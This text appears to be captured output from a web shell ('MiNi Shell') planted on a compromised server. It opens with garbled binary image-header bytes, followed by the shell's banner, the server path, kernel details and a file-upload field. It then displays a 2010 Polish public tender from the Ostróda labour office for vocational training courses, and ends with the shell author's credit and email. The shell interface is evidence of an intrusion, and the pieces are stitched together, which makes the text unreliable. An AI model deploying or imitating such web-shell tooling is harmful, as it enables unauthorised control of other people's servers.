JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100428/102425-N-2010.html

<p class="kh_header"><b>Ostróda: Przedmiotem Zamówienia jest organizacja i przeprowadzenie na rzecz Zamawiającego usługi szkolenia zawodowego CPV 80423000-5</b><br>
<b>Numer ogłoszenia: 102425 - 2010; data zamieszczenia: 28.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Mickiewicza 32, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 0-89 646-42-92, faks 0-89 646-29-56.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem Zamówienia jest organizacja i przeprowadzenie na rzecz Zamawiającego usługi szkolenia zawodowego CPV 80423000-5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia jest organizacja i przeprowadzenie na rzecz Zamawiającego usługi szkolenia zawodowego CPV 80423000-5 w zakresie następujących szkoleń:
1.	Florysta z elementami pielęgnacji terenów zielonych - grupa 16 - osobowa.
2.	Brukarz - grupa 10 - osobowa.
3.	Blacharz-dekarz -  grupa 16-osobowa.
4.	Technolog zewnętrznych robót wykończeniowych w budownictwie - grupa 16-osobowa.
5.	Technolog budowlany zewnętrznych robót wykończeniowych z elementami wykończenia wnętrz - grupa 16-osobowa.
6.	Parkieciarz - grupa 16-osobowa.
7.	Hydraulik (monter instalacji i urządzeń sanitarnych) - grupa 16-osobowa.
8.	ABC przedsiębiorczości -  grupa 50-osobowa.
Zasady ogólne organizacji szkoleń:
Każde ze szkoleń musi odbywać się codziennie w godzinach 7.30-15.00, od poniedziałku do piątku, oprócz soboty i niedzieli, po co najmniej 8 godzin dydaktycznych dziennie (jedna godzina dydaktyczna to 45 min.). Szkolenia mają być oparte o metody wykorzystujące zastosowanie kwestionariuszy, ćwiczeń, przykładów praktycznych, gier szkoleniowych, zajęć symulacyjnych i innych metod szkoleniowych, w celu aktywnego uczestnictwa osób szkolonych i prowadzenia oceny procesu zdobywania wiedzy w trakcie szkolenia. Szkolenia, zarówno cześć teoretyczna, jak i praktyczna, muszą być organizowane w odpowiednich pomieszczeniach i miejscach z zapewnionym zapleczem do przeprowadzenia szkolenia, zgodnie z wymaganiami polskiego prawa, tj. posiadać odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe oraz wyposażone w niezbędne pomoce dydaktyczne. Każdy uczestnik szkolenia po jego zakończeniu musi otrzymać zaświadczenie zgodnie ze wzorem stanowiącym załącznik nr 1 do rozporządzenie Ministra Edukacji I Nauki z dnia 3 lutego 2006 r. W sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z dnia 27 lutego 2006 r.). Na szkoleniach trzeba prowadzić imienną listę obecności, dziennik zajęć, wypełniany codziennie zgodnie z zaproponowanym programem i harmonogramem, listy potwierdzone przez uczestników szkolenia wydanych materiałów biurowych, dydaktycznych, odzieży ochronnej, itp. Dla każdego ze szkoleń należy prowadzić wyodrębnioną dokumentację księgową poniesionych wydatków w formie faktur, rachunków, umów zlecenia, itp.
Zasady szczególne organizacji szkolenia:
Część pierwsza przedmiotu zamówienia: Florysta z elementami pielęgnacji terenów zielonych.
Szkoleniem zostanie objęta grupa 16 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Ostródzie. Urząd dla zajęć praktycznych w zakresie pielęgnacji terenów zielonych zabezpiecza miejsce praktyk. Na zakup materiałów do przeprowadzenia części praktycznej należy przeznaczyć kwotę w wysokości 4000,00 złotych. Szkolenie musi zostać przeprowadzone w wymiarze 238 godzin dydaktycznych na osobę. Program szkolenie musi zawierać następujące moduły szkoleniowe: 
8 godz. -  szkolenie z zakresu bhp - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia,
40 godz. - szkolenia z zakresu nauki zakładania, prowadzenia i sporządzania biznes planu - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia - celem szkolenia jest zwiększenie motywacji i pozyskanie wiedzy i umiejętności do prowadzenia własnej działalności gospodarczej. 
40 godz. - zajęcia teoretyczne z zakresu florystyki i pielęgnacji terenów zielonych,
150 godz. zajęcia praktyczne z zakresu florystyki i pielęgnacji terenów zielonych.
Konieczność wydania osobnego zaświadczenia o odbyciu szkolenia florysty z elementami pielęgnacji terenów zielonych.
Celem kursu jest przygotowanie jego absolwentów do wykonywania zawodu pracownika kwiaciarni, pracowni florystycznej bądź zakładu zajmującego się architekturą krajobrazu lub pielęgnację terenów zielonych, jak również założenia i prowadzenia własnej działalności gospodarczej związanej z tematyką szkolenia.
Część druga przedmiotu zamówienia: Brukarz.
Szkoleniem zostanie objęta grupa 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Ostródzie. Urząd dla zajęć praktycznych w zakresie wykonywania prac brukarskich zabezpiecza miejsce praktyk. Na zakup materiałów do przeprowadzenia części praktycznej należy przeznaczyć kwotę w wysokości 5000,00 złotych. Szkolenie musi zostać przeprowadzone w wymiarze 198 godzin dydaktycznych na osobę. Program szkolenie musi zawierać następujące moduły szkoleniowe: 
8 godz. -  szkolenie z zakresu bhp - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia,
40 godz. - zajęcia teoretyczne z zakresu nauki zawodu brukarza,
150 godz. zajęcia praktyczne z zakresu wykonywania prac brukarskich.
Konieczność wydania osobnego zaświadczenia o odbyciu szkolenia brukarza.
Celem kursu jest przygotowanie jego absolwentów do wykonywania zawodu brukarza.
Część trzecia przedmiotu zamówienia: Blacharz-dekarz.
Szkoleniem zostanie objęta grupa 16 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Ostródzie. Urząd dla zajęć praktycznych w zakresie prac dekarskich i blacharskich zabezpiecza miejsce praktyk. Na zakup materiałów do przeprowadzenia części praktycznej należy przeznaczyć kwotę w wysokości 7000,00 złotych. Szkolenie musi zostać przeprowadzone w wymiarze 240 godzin dydaktycznych na osobę. Program szkolenie musi zawierać następujące moduły szkoleniowe: 
16 godz. -  szkolenie z zakresu bhp - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia,
40 godz. - szkolenia z zakresu nauki zakładania, prowadzenia i sporządzania biznes planu - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia - celem szkolenia jest zwiększenie motywacji i pozyskanie wiedzy i umiejętności do prowadzenia własnej działalności gospodarczej. 
50 godz. - zajęcia teoretyczne z zakresu nauki teorii zawodu dekarza-blacharza,
144 godz. zajęcia praktyczne z zakresu wykonywania prac dekarsko-blacharskich.
Konieczność wydania osobnego zaświadczenia o odbyciu szkolenia dekarz-blacharz oraz dodatkowego zaświadczenia o odbyciu kursu zawodowego dekarz.
Celem kursu jest przygotowanie jego absolwentów do wykonywania zawodu dekarza oraz przygotowanie do odbycia egzaminu potwierdzającego kwalifikacje zawodowe dekarza zgodnie Rozporządzeniem Ministra Edukacji Narodowej I Sportu z dnia 3 lutego 2003 r. w sprawie standardów wymagań będących podstawą przeprowadzania egzaminu potwierdzającego kwalifikacje zawodowe
(Dz. U. z dnia 24 marca 2003 r.).
Część czwarta przedmiotu zamówienia: Technolog zewnętrznych robót wykończeniowych w budownictwie.
Szkoleniem zostanie objęta grupa 16 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy Filia w Morągu. Urząd dla zajęć praktycznych w zakresie prac wykończeniowych (elewacje, ocieplenia budynków, itp.) zabezpiecza miejsce praktyk. Na zakup materiałów do przeprowadzenia części praktycznej należy przeznaczyć kwotę w wysokości 6000,00 złotych. Szkolenie musi zostać przeprowadzone w wymiarze 232 godzin dydaktycznych na osobę. Program szkolenie musi zawierać następujące moduły szkoleniowe: 
8 godz. -  szkolenie z zakresu bhp - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia,
40 godz. - szkolenia z zakresu nauki zakładania, prowadzenia i sporządzania biznes planu - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia - celem szkolenia jest zwiększenie motywacji i pozyskanie wiedzy i umiejętności do prowadzenia własnej działalności gospodarczej. 
40 godz. - zajęcia teoretyczne z zakresu nauki teorii zawodu technologa robót wykończeniowych,
144 godz. zajęcia praktyczne z zakresu wykonywania prac wykończeniowych zewnętrznych.
Konieczność wydania osobnego zaświadczenia o odbyciu szkolenia technologa zewnętrznych robót wykończeniowych w budownictwie.
Celem kursu jest przygotowanie jego absolwentów do wykonywania zawodu pracownika budowlanego wykonującego czynności montażu ociepleń, malowania konserwacji i napraw elewacji zewnętrznych budynku.
Część piąta przedmiotu zamówienia: Technolog budowlany zewnętrznych robót wykończeniowych z elementami wykończenia wnętrz.
Szkoleniem zostanie objęta grupa 16 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Ostródzie. Urząd dla zajęć praktycznych w zakresie prac wykończeniowych zewnętrznych (elewacje, ocieplenia budynków, itp.) i prac wykończeniowych wewnętrznych (szpachlowane, malowanie, układanie wykładzin, układanie posadzek, itp.) zabezpiecza miejsce praktyk. Na zakup materiałów do przeprowadzenia części praktycznej należy przeznaczyć kwotę w wysokości 7000,00 złotych. Szkolenie musi zostać przeprowadzone w wymiarze 258 godzin dydaktycznych na osobę. Program szkolenie musi zawierać następujące moduły szkoleniowe: 
8 godz. -  szkolenie z zakresu bhp - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia,
40 godz. - szkolenia z zakresu nauki zakładania, prowadzenia i sporządzania biznes planu - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia - celem szkolenia jest zwiększenie motywacji i pozyskanie wiedzy i umiejętności do prowadzenia własnej działalności gospodarczej. 
50 godz. - zajęcia teoretyczne z zakresu nauki teorii zawodu technologa robót wykończeniowych zewnętrznych i wewnętrznych w budownictwie,
160 godz. zajęcia praktyczne z zakresu wykonywania prac wykończeniowych zewnętrznych i wewnętrznych.
Konieczność wydania osobnego zaświadczenia o odbyciu szkolenia technologa budowlanego zewnętrznych robót wykończeniowych z elementami wykańczania wnętrz.
Celem kursu jest przygotowanie jego absolwentów do wykonywania zawodu pracownika budowlanego wykonującego czynności montażu ociepleń, malowania konserwacji i napraw elewacji zewnętrznych budynku oraz prac wykończeniowych wewnątrz budynków, układanie posadzek, szpachlowanie, malowanie ścian.
Część szósta przedmiotu zamówienia: Parkieciarz.
Szkoleniem zostanie objęta grupa 16 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Ostródzie. Urząd dla zajęć praktycznych w zakresie prac układania parkietów zabezpiecza miejsce praktyk. Na zakup materiałów do przeprowadzenia części praktycznej należy przeznaczyć kwotę w wysokości 6000,00 złotych. Szkolenie musi zostać przeprowadzone w wymiarze 232 godzin dydaktycznych na osobę. Program szkolenie musi zawierać następujące moduły szkoleniowe: 
8 godz. -  szkolenie z zakresu bhp - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia,
40 godz. - szkolenia z zakresu nauki zakładania, prowadzenia i sporządzania biznes planu - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia - celem szkolenia jest zwiększenie motywacji i pozyskanie wiedzy i umiejętności do prowadzenia własnej działalności gospodarczej. 
40 godz. - zajęcia teoretyczne z zakresu nauki teorii zawodu parkieciarza,
144 godz. zajęcia praktyczne z zakresu wykonywania prac parkieciarskich.
Konieczność wydania osobnego zaświadczenia o odbyciu szkolenia parkieciarza.
Celem kursu jest przygotowanie jego absolwentów do wykonywania zawodu parkieciarza.
Część siódma przedmiotu zamówienia: Hydraulik (monter instalacji i urządzeń sanitarnych).
Szkoleniem zostanie objęta grupa 16 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Ostródzie. Szkolenie musi zostać przeprowadzone w wymiarze 208 godzin dydaktycznych na osobę. Program szkolenie musi zawierać następujące moduły szkoleniowe: 
8 godz. -  szkolenie z zakresu bhp - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia,
40 godz. - szkolenia z zakresu nauki zakładania, prowadzenia i sporządzania biznes planu - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia - celem szkolenia jest zwiększenie motywacji i pozyskanie wiedzy i umiejętności do prowadzenia własnej działalności gospodarczej. 
40 godz. - zajęcia teoretyczne z zakresu nauki teorii zawodu montera instalacji i urządzeń sanitarnych,
120 godz. zajęcia praktyczne z zakresu wykonywania prac montera instalacji i urządzeń sanitarnych.
Konieczność wydania osobnego zaświadczenia o odbyciu kursu zawodowego montera instalacji i urządzeń sanitarnych.
Celem kursu jest przygotowanie jego absolwentów do wykonywania zawodu hydraulika oraz przygotowanie do odbycia egzaminu potwierdzającego kwalifikacje zawodowe montera instalacji i urządzeń sanitarnych (kod zawodu 71302) zgodnie Rozporządzeniem Ministra Edukacji Narodowej I Sportu z dnia 3 lutego 2003 r. w sprawie standardów wymagań będących podstawą przeprowadzania egzaminu potwierdzającego kwalifikacje zawodowe (Dz. U. z dnia 24 marca 2003 r.).
Część ósma przedmiotu zamówienia: ABC przedsiębiorczości.
Szkoleniem zostanie objęta grupa 50 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Ostródzie. Szkolenie zostanie przeprowadzone sukcesywnie w pięciu grupach dydaktycznych po 10 osób. Szkolenie musi zostać przeprowadzone w wymiarze 80 godzin dydaktycznych na osobę. 
Konieczność wydania osobnego zaświadczenia o odbyciu kursu ABC Przedsiębiorczości.
Celem kursu jest przygotowanie jego absolwentów do zakładania i prowadzenia własnej działalności gospodarczej, pozyskiwania źródeł finansowych dla działalności, sporządzanie biznes planu.
Odbiór wykonanej usługi następuje na podstawie przedłożonych zamawiającemu kserokopii zaświadczeń i certyfikatów wydanych uczestnikom szkolenia, list obecności, list potwierdzających otrzymane materiały dydaktyczne, biurowe, odzież ochronną, itp. oraz kontroli przeprowadzonej przez zamawiającego w zakresie sprawdzenia poniesionych wydatków finansopwych. 
Zamówienie jest prowadzone w częściach. Każdy z kierunków szkolenia stanowi osobną część zamówienia. Nie ogranicza się ilości części, o które może ubiegać się wykonawca. Na każdą część należy złożyć osobną ofertę.
Nie przewiduje się zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 i 7 ustawy z dnia 29 stycznia 2004 r. prawo zamówień publicznych.
Nie dopuszcza się składania ofert wariantowych.
Nie dopuszcza się powierzenia zamówienia podwykonawcom.
Postępowanie nie jest prowadzone w celu zawarcia umowy ramowej, ustanowienia dynamicznego systemu zakupów oraz nie przewiduje się aukcji elektronicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.42.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności. Warunek uznaje się za spełniony, jeżeli wykonawca posiada aktualny wpis do rejestru instytucji szkoleniowych, a dodatkowo dla instytucji, które chcą się ubiegać o część trzecią i siódmą przedmiotu zamówienia posiada akredytację właściwego kuratorium oświaty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie. Warunek uznaje się za spełniony, jeżeli wykonawca w okresie ostatnich trzech lat przed upływem terminu do składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zorganizował i przeprowadził, co najmniej dwa szkolenia dla grup, co najmniej 10-osobowych o kierunku zgodnym z przedmiotem zamówienia, o który się ubiegają.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Warunek uznaje się za spełniony, jeżeli wykonawca w części, o którą się ubiega odpowiednio dysponuje:
dla każdej z części zamówienia: salą wykładową do przeprowadzenia zajęć,
dla części siódmej przedmiotu zamówienia: miejscem, w którym zostaną przeprowadzone zajęcia praktyczne,
dla części pierwszej, drugiej, trzeciej, czwartej, piątej, szóstej i siódmej: co najmniej jednym wykładowcą bhp,
dla części pierwszej, drugiej, trzeciej, czwartej, piątej, szóstej i siódmej: co najmniej jednym trenerem do zajęć praktycznych, który posiada kwalifikacje instruktora praktycznej nauki zawodu (Rozporządzenie Ministra Edukacji Narodowej I Sportu z dnia 1 lipca 2002 r. w sprawie praktycznej nauki zawodu. Dz. U. z dnia 20 lipca 2002 r.) oraz wykształcenie i doświadczenie zawodowe o profilu zgodnym z tematami i zakresem zajęć, które odpowiadają kierunkom szkoleń dla poszczególnych części zamówienia,
dla każdej z części zamówienia: co najmniej jednym wykładowcą, który posiada wykształcenie i doświadczenie zawodowe o profilu zgodnym z tematami i zakresem zajęć, które odpowiadają kierunkom szkoleń dla poszczególnych części zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Warunek uznaje się za spełniony, jeżeli wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie wykonywanej działalności w wysokości nie niżej niż oferowana cena za części zamówienia, o które się ubiega.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 35</li>
<li>2 - Program szkolenia - 32</li>
<li>3 - Kwalifikacje i doświadczenie kadry dydaktycznej - 15</li>
<li>4 - Zaplecze dydaktyczno-szkoleniowe - 14</li>
<li>5 - Certyfikaty jakości usług - 4</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zakresie terminu realizacji i wielkości grup szkoleniowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http//pup.ostroda.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Ostródzie 
Adres do korespondencji: 14-100 Ostróda ul. Mickiewicza 32.
 fax. 089-646-29-56.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2010 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Ostródzie 
Adres do korespondencji: 14-100 Ostróda ul. Mickiewicza 32.
pok.101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Programu Operacyjnego Kapitał Ludzki, Priorytetu VI: Rynek Pracy Otwarty dla Wszystkich, Poddziałanie 6.1.3 Poprawa Zdolności Do Zatrudnienia oraz Podnoszenie Poziomu Aktywności Zawodowej Osób bezrobotnych, tytuł projektu: Pakt - PROMOCJA AKTYWNOŚCI współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com